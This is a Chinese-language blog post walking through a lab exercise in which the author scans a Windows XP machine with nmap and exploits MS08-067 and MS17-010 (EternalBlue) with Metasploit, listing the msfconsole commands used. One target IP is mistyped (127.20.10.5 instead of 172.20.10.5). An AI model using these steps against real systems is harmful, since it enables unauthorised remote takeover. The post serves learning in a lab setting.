使用metasploit漏洞测试

没网闲着无聊,灵魂无处安放呀,就简单的用metasploit玩玩。

实验环境:

目标主机:Windows XP professional

攻击机: kali linux

1.漏洞扫描 

nmap --script=vuln 172.20.10.5

扫描结果提示,易受攻击的有:

1.CVE-2008-4250 Microsoft Windows系统易受远程代码执行攻击(MS08-067)
2.CVE-2017-0143 Microsoft SMBV1服务器中的远程代码执行漏洞(MS17-010)

以上述两个为例学习使用metasploit漏洞利用模块进行攻击:

2.漏洞利用

实例一:使用MS08-067模块进行攻击测试

命令:
启动Metasploit:msfconsole
        msf5 >:search ms08_067 /*查找可用的攻击模块*/
        msf5 >:use exploit/windows/smb/ms08_067_netapi  //使用模块
 

输入info 可用目标主机,本次环境目标为34 ,设置目标环境set target 34

显示payload 需要设置的项,如下图需要设置目标主机,设置好后执行攻击

msf5 >:set target 34   //设置目标主机的系统版本,防止语言导致攻击失败
msf5 >:show payload    //显示需要设置的项
msf5 >:set rhost  127.20.10.5 //设置目标主机Ip 
msf5 >:exploit      //执行攻击

成功后meterpreter输入shell即可远程执行相关任务,查看用户名等操作。

实例二:利用MS17-010进行攻击测试,同里查看可用的攻击模块

同样的我们这次选用eternalblue smb远程windows内核池破坏

设置好相关参数后开始执行攻击,由于目标主机重启后未激活,导致利用漏洞攻击成功,但未能建立会话,目标主机正常启动就能成功建立会话。

系统未激活导致无法进入,建立连接。

 

总体来说在漏洞测试方面,metasploit是非常强,简单高效的操作提高工作效率

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章